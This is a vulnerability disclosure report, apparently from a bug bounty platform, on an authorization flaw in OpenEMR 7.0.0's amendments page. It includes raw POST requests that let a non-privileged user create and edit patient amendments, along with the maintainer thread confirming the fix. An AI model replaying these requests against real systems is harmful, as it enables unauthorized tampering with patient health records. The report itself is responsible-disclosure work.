Unauthorized to create and edit Amendments function in openemr/openemr

Valid

Reported on

Jul 21st 2022

Description

We would like to report the vulnerability we found during software testing. The OpenEMR 7.0.0 (latest version) Open Source electronic health records and medical practice management application has unauthorized create and edit on β€œPatient/dashboard/Amendments” with function β€œadd_edit_amendments.php” and it never been reported before (We've checked from CVE Official website).

Vulnerability Type

Improper privilege management

Affected Page/URL

https://<openemrurl>/interface/patient_file/summary/add_edit_amendments.php

Sample Payload

ADD POST /interface/patient_file/summary/add_edit_amendments.php HTTP/1.1

csrf_token_form=…&amendment_date=…&form_amendment_by=patient&desc=Change_from_Acc_Pentest6&form_amendment_status=approved&note=Account_Pentest6&mode=&amendment_id=

EDIT POST /interface/patient_file/summary/add_edit_amendments.php HTTP/1.1

csrf_token_form=…&amendment_date=…&form_amendment_by=patient&desc=Change_from_Acc_Pentest6&form_amendment_status=approved&note=Account_Pentest6&mode=&amendment_id=590

Vulnerable Source Code

/var/www/localhost/htdocs/interface/patient_file/summary/add_edit_amendments.php (Please see more details in the occurrences section)

Implication

This vulnerability allows a perpetrator could create and edit amendments without authorization. The vulnerability could have adversely impact on integrity, confidentiality, and reliability of the system and information.

Recommendation

We recommended to implement the proper authorization checks on the user before the task execution. The checks should include whether the user has the authorized permission to execute the task. In addition, the application should alert the system administrator when the malicious activity was detected.

Discoverer/Reporters

  • Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team

Example PoC Screenshots

OpenEMR Version 7.0.0

1.png

Login with admin privilege with can access Dashboard menu

2.png 3.png

Create Amendments with admin privilege

4.png

Login with non-privilege β€œPentest6” and it cannot access dashboard menu

5.png

Use Amendments add payload from admin with non-privilege user β€œPentest6”

6.png

Successfully add Amendments without authorization

7.png

Check Amendments was add by non-privilege user β€œPentest6”

8.png

Edit Amendments with non-privilege user β€œPentest6”

9.png

Successfully edit Amendments without authorization

10.png

Check Amendments was edit by non-privilege user β€œPentest6”

11.png

Add/Edit payload

POST /interface/patient_file/summary/add_edit_amendments.php HTTP/1.1
Host: localhost
Cookie: OpenEMR=nNgu3SLWSszYihXtJimCwcxANGWirBrgThxiT22kK1UkbkNO
Content-Length: 214
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: https://localhost/interface/patient_file/summary/add_edit_amendments.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

csrf_token_form=373f96454dd2af0b6a713b223e69ce9b16f09491&amendment_date=2022-07-22&form_amendment_by=patient&desc=Change_from_Acc_Pentest6&form_amendment_status=approved&note=Account_Pentest6&mode=&amendment_id=591

Impact

This vulnerability allows a perpetrator could create and edit amendments without authorization. The vulnerability could have adversely impact on integrity, confidentiality, and reliability of the system and information.

We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
Brady Miller validated this vulnerability a year ago

Thanks for the report. We are working on a fix.

rata99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago
Brady Miller
a year ago

Maintainer

A preliminary fix has been posted in commit 2973592bc7b1f4996738a6fd27d1e277e33676b6

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, then will be ok to make CVE # and make it public.

Thanks!

rata99
a year ago

Researcher

Hi Brady, Thank you so much.

We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago
rata99
a year ago

Researcher

Dear @Brady Miller, @admin Hope you are doing well. We have got the notification email that the 1st patch for OpenEMR 7.0.0 has been released. Can the CVE be assigned to this issue?

Screen-Shot-2022-08-08-at-9-48-42-AM.png

Jamie Slome
a year ago

Admin

Just waiting for the go-ahead from the maintainer and then we can assign and publish a CVE for this report πŸ‘

Brady Miller marked this as fixed in 7.0.0.1 with commit 297359 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller
a year ago

Maintainer

OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

rata99
a year ago

Researcher

Hi @Jamie Slome @Admin could you please help to assign CVE to this issue? Thank you :)

Jamie Slome
a year ago

Admin

Sorted πŸ‘ CVE will be published in a few hours from now!

to join this conversation